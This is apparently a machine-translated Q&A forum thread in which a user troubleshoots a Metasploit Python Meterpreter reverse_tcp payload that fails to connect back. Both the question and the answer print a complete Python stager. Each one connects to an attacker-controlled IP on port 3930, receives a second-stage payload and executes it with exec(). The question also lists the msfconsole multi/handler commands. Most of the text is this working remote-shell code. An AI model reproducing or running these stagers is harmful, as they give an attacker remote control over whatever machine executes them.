2016-03-05 57 views
0

我已經使用msfvenom創建以下蟒蛇有效載荷:Meterpreter就會無法連接回 - Python的

import socket,struct 
s=socket.socket(2,socket.SOCK_STREAM) 
s.connect(('MY PUBLIC IP',3930)) 
l=struct.unpack('>I',s.recv(4))[0] 
d=s.recv(l) 
while len(d)<l: 
    d+=s.recv(l-len(d)) 
exec(d,{'s':s}) 

那麼我已經打開了msfconsole,並做了以下內容:

use exploit/multi/handler 
set payload python/meterpreter/reverse_tcp 
set LHOST 192.168.0.186 (MY LOCAL IP) 
set LPORT 3930 
exploit 

它開始反向TCP處理程序在192.168.0.186:3930上,並啓動負載處理程序。但是,當我在另一臺計算機上運行該腳本時,等待大約一分鐘後,有效負載會超時,並且msfconsole不會註冊任何內容。我有端口在路由器上轉發3930。我在這裏做錯了什麼?

回答

0

這是我用來在Unix系統上使用反向TCP的代碼,以及你提供的細節。但是,我錯誤搜索後偶然發現了你的帖子,所以這不是100%完美無瑕。過去我已經完成了它的工作,但最近它開始滯後。它會在內部系統上運行一次,但之後的任何內容都會給我提供相同的錯誤消息。在廣域網上進行此操作時,我也會得到相同的信息,與LAN相反,但它不會在第一時間運行。你有什麼ISP?它可能完全依賴於此。

import socket,struct 
s=socket.socket(2,1) 
s.connect(('IP ADDRESS',3930)) 
l=struct.unpack('>I',s.recv(4))[0] 
d=s.recv(4096) 
while len(d)!=l: 
    d+=s.recv(4096) 
exec(d,{'s':s})